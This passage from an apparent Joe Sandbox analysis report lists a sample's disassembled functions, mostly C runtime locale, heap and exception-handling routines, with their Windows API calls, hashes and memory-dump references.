                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: a2b1053ad2fd5c2eee0689d522216b0ccb0bbf11938d58076b7bbafc88d5e47f
                                                      • Instruction ID: 9aaebffbcb6ac793e98012c5fd5c02070bcf1ca56bbe1d74899b180915916844
                                                      • Opcode Fuzzy Hash: a2b1053ad2fd5c2eee0689d522216b0ccb0bbf11938d58076b7bbafc88d5e47f
                                                      • Instruction Fuzzy Hash: 1C115771A0420AAFCF05DF58E94199B7BF4EF48304F008469F808EB351D630EA15DB65
                                                      Function 00F6817A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 444 f6817a-f68185 445 f68187-f68191 444->445 446 f68193-f68199 444->446 445->446 447 f681c7-f681d2 call f61f44 445->447 448 f681b2-f681c3 RtlAllocateHeap 446->448 449 f6819b-f6819c 446->449 453 f681d4-f681d6 447->453 450 f681c5 448->450 451 f6819e-f681a5 call f66c34 448->451 449->448 450->453 451->447 457 f681a7-f681b0 call f66c7f 451->457 457->447 457->448
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,00F6937F,00000001,00000364,?,00000005,000000FF,?,?,00F61F49,00F6950F), ref: 00F681BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 2c85f6a5c218675a6b8526855494a9bfd2f92bba50d219a1f9182cf1bcc39230
                                                      • Instruction ID: 5f5ff953bcf44b2f2c873c17577b8612a2b7cd5610b66f7e6a79f2231a86b362
                                                      • Opcode Fuzzy Hash: 2c85f6a5c218675a6b8526855494a9bfd2f92bba50d219a1f9182cf1bcc39230
                                                      • Instruction Fuzzy Hash: 67F08932A016256BDF215B65DC05B6A376DAF437F0F15422ABC48E6191CF74D803B7E1
                                                      Function 00F73905 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 460 f73905-f73929 CreateFileW
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,00000000,?,00F73CF5,?,?,00000000,?,00F73CF5,?,0000000C), ref: 00F73922
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 0ab32e978f13d75a8aaa86677d837e58c29efe3650e6c164c8094271ee3894b2
                                                      • Instruction ID: d6a36405210847362e28ef4efa1cda5c746a2491a87e50b70d6cd8ec1d36c989
                                                      • Opcode Fuzzy Hash: 0ab32e978f13d75a8aaa86677d837e58c29efe3650e6c164c8094271ee3894b2
                                                      • Instruction Fuzzy Hash: 64D06C3200010DBBDF028F84DC06EDA3BAAFB88714F114040FA1856020C772E871AB91

                                                      Non-executed Functions

                                                      Function 00F7420D Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: f690dabc765175ab7a60752586344e40fd9ad6d8b5541cdf8cb879942bdc9d98
                                                      • Instruction ID: 2d8086fdc490cc077552dd3320f3c8769ae2c7a8c7ad6e02d4dcb3e0e14a1a31
                                                      • Opcode Fuzzy Hash: f690dabc765175ab7a60752586344e40fd9ad6d8b5541cdf8cb879942bdc9d98
                                                      • Instruction Fuzzy Hash: 4FD22872E086288FDB65CF28DD407EAB7B5EB44315F1485EAD40DE7240E778AE819F42
                                                      Function 00F72941 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(3FC00000,2000000B,00F72C5F,00000002,00000000,?,?,?,00F72C5F,?,00000000), ref: 00F729DA
                                                      • GetLocaleInfoW.KERNEL32(3FC00000,20001004,00F72C5F,00000002,00000000,?,?,?,00F72C5F,?,00000000), ref: 00F72A03
                                                      • GetACP.KERNEL32(?,?,00F72C5F,?,00000000), ref: 00F72A18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: e462c49921bd2cb8a78996aabca0daefa2d4bf7c6433d48b8fb492740096edd8
                                                      • Instruction ID: 570ce10152c940a494f020f2a3cd74c045d35854a88fc24596a531730645cc42
                                                      • Opcode Fuzzy Hash: e462c49921bd2cb8a78996aabca0daefa2d4bf7c6433d48b8fb492740096edd8
                                                      • Instruction Fuzzy Hash: 0B219522E00105A7E7B48B64D900B97B2B6EB54B74F5AC426EA4DE7105E732DD40F752
                                                      Function 00F72B16 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F72C22
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00F72C6B
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00F72C7A
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F72CC2
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F72CE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 415426439-0
                                                      • Opcode ID: 04b09934004e879a19c82f6f33f643fdfc64818df0fa05becb72f27b541e45ab
                                                      • Instruction ID: fd0b27064c46668714e42b268c9674f998a34889dd3eafbf774ee014ff9a66b0
                                                      • Opcode Fuzzy Hash: 04b09934004e879a19c82f6f33f643fdfc64818df0fa05becb72f27b541e45ab
                                                      • Instruction Fuzzy Hash: 69519471E00209ABDB61DFA4CC41EBE73B8BF58320F55846AE918E7191D7749940EB63
                                                      Function 00F721B2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00F65CC8,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F72273
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F65CC8,?,?,?,00000055,?,-00000050,?,?), ref: 00F7229E
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F72401
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                      • String ID: utf8
                                                      • API String ID: 607553120-905460609
                                                      • Opcode ID: 44771d6aafbe5dbe1ba0b7ff559c0305acafb3fc37f3dd6e2a51bb9d9b376f26
                                                      • Instruction ID: 62b547e04f45d2bc08bbdc7682431e0fd61d451c3002fd0f58f28cc51d9b8542
                                                      • Opcode Fuzzy Hash: 44771d6aafbe5dbe1ba0b7ff559c0305acafb3fc37f3dd6e2a51bb9d9b376f26
                                                      • Instruction Fuzzy Hash: F0711771A00206AAEB64AF74CC46BAA73ACFF45310F10C42BF90DD7182EA78D941F752
                                                      Function 00F696DB Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: 252da8c2916a6ccd7a08688b1d0fc99207b249f10b85b28511e47a57bb66c47f
                                                      • Instruction ID: e559949af4ed6c373492fd83d670795de6e0e88ef39f6bee8fb4353cd435a369
                                                      • Opcode Fuzzy Hash: 252da8c2916a6ccd7a08688b1d0fc99207b249f10b85b28511e47a57bb66c47f
                                                      • Instruction Fuzzy Hash: B8B15932D082459FDF15CF68C881BFEBBE9EF45350F14816AE905AB241D2B9DD01EBA1
                                                      Function 00F5B991 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F5B99D
                                                      • IsDebuggerPresent.KERNEL32 ref: 00F5BA69
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F5BA89
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F5BA93
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 304eb7ff29c29b2feb904779a2ecbb650c56f234b15e343be735041d7d14f5fc
                                                      • Instruction ID: 4767ead35a17b32364f9cf35a24eaacb23690d43500eea8e5702a7a0c5755d1a
                                                      • Opcode Fuzzy Hash: 304eb7ff29c29b2feb904779a2ecbb650c56f234b15e343be735041d7d14f5fc
                                                      • Instruction Fuzzy Hash: 8A313875D0521C9BDB20DFA4DD89BCCBBB8BF08301F1040AAE50DAB250EB749A89DF45
                                                      Function 00F725C5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72619
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72663
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast
                                                      • String ID:
                                                      • API String ID: 661929714-0
                                                      • Opcode ID: 69440b8aae4bf9ec1ee0742950069987694233322a5fb3020ae0be7174185136
                                                      • Instruction ID: b0640a044f08f4092c744ef701fa1dbcf9ed4f31b3bfa55610334e2ad66fee3d
                                                      • Opcode Fuzzy Hash: 69440b8aae4bf9ec1ee0742950069987694233322a5fb3020ae0be7174185136
                                                      • Instruction Fuzzy Hash: A36194719001079BDB689F28CD82B7A77A8FF14310F10817BE919C6185E778DA82FB52
                                                      Function 00F61C34 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00F61D2C
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00F61D36
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00F61D43
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: a7279064115c6cd1ced1fcac61bb3970f06ec94293cf7780f80f08ab874fb325
                                                      • Instruction ID: 8d09670e7461e965f361ec58e0bc8a2c1d948dd7c689a78210463ca44d044917
                                                      • Opcode Fuzzy Hash: a7279064115c6cd1ced1fcac61bb3970f06ec94293cf7780f80f08ab874fb325
                                                      • Instruction Fuzzy Hash: 6A31C17490122CABCB21DF24DC88BCCBBB8BF48351F5041EAE90CA7290E7749B859F45
                                                      Function 00F63B40 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636ed376910306cad64807a91013b3093d4a624d03e1325861f7855058dad1ff
                                                      • Instruction ID: d72bc38370877da59cae7e46ff942b14e133af75434028065d6b7e943f3113df
                                                      • Opcode Fuzzy Hash: 636ed376910306cad64807a91013b3093d4a624d03e1325861f7855058dad1ff
                                                      • Instruction Fuzzy Hash: 46F12E71E002199FDF18CF68D880AADF7B1FF88324F158269E915AB391D731AE45DB90
                                                      Function 00F6D2BB Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,3FC00000,?,00000008,?,?,00F6D2B6,3FC00000,?,00000008,?,?,00F76D94,00000000), ref: 00F6D4E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: b610d7eecdbe4347fd6c72c602fe948daf7da2f64bde3d9cad63636a5f76977a
                                                      • Instruction ID: 942f509b162db22a58d0578e04d145d5f2e25e0de337ce720c4d8110d608bc17
                                                      • Opcode Fuzzy Hash: b610d7eecdbe4347fd6c72c602fe948daf7da2f64bde3d9cad63636a5f76977a
                                                      • Instruction Fuzzy Hash: 62B14C72A10609CFD719CF28C486B657BE0FF45368F298658E89ACF2A1C735ED81DB41
                                                      Function 00F5B675 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F5B68B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 6ecbbec53bb26ecbddea6f1adef40bded1b984a2afbd0ff6e7793e5fa35c4573
                                                      • Instruction ID: 231349deec7b618058438f8801041c8de81f7edb9cd350a8e97f5a7747269528
                                                      • Opcode Fuzzy Hash: 6ecbbec53bb26ecbddea6f1adef40bded1b984a2afbd0ff6e7793e5fa35c4573
                                                      • Instruction Fuzzy Hash: FD516D71D156098FDB18CF58E8D57AEBBF4FB48326F28802AD901EB290D3759944DF50
                                                      Function 00F72818 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
